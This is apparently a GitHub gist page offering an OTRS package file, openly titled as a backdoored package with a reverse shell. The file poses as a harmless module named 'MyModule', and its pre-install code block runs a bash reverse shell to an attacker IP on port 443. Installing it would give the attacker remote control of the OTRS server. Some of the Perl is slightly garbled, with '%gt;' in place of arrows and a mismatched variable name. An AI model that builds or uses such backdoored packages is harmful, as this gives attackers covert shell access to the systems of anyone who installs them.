-
-
Save r3k2/5b1d04787dc83a050d76fba22b59f1c3 to your computer and use it in GitHub Desktop.
OTRS OPM backdoored Package with Reverse Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8" ?> | |
<otrs_package version="1.1"> | |
<Name>MyModule</Name> | |
<Version>1.0.0</Version> | |
<Vendor>My Module</Vendor> | |
<URL>http://otrs.org/</URL> | |
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> | |
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> | |
<Description Lang="en">MyModule</Description> | |
<Framework>5.x.x</Framework> | |
<BuildDate>2016-09-23 11:17:41</BuildDate> | |
<BuildHost>opms.otrs.com</BuildHost> | |
<Framework>5.0.x</Framework> | |
<IntroInstall Lang="en" Title="My Module" type="pre"> | |
<br> | |
Hello wolrd | |
<br> | |
((Hello!)) | |
<br> | |
</IntroInstall> | |
<CodeInstall type="pre"> | |
print qx(bash -i >& /dev/tcp/<ATTACKER_IP>/443 0>&1 &); | |
</CodeInstall> | |
<CodeInstall Type="post"> | |
# create the package name | |
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content}; | |
$Kernel::OM->Get($ModeModule)-%gt;CodeInstall(); | |
</CodeInstall> | |
<CodeUninstall type="pre"> | |
my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content}; | |
$Kernel::OM->Get($CodeModule)->CodeUninstall(); | |
</CodeUninstall> | |
</otrs_package> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment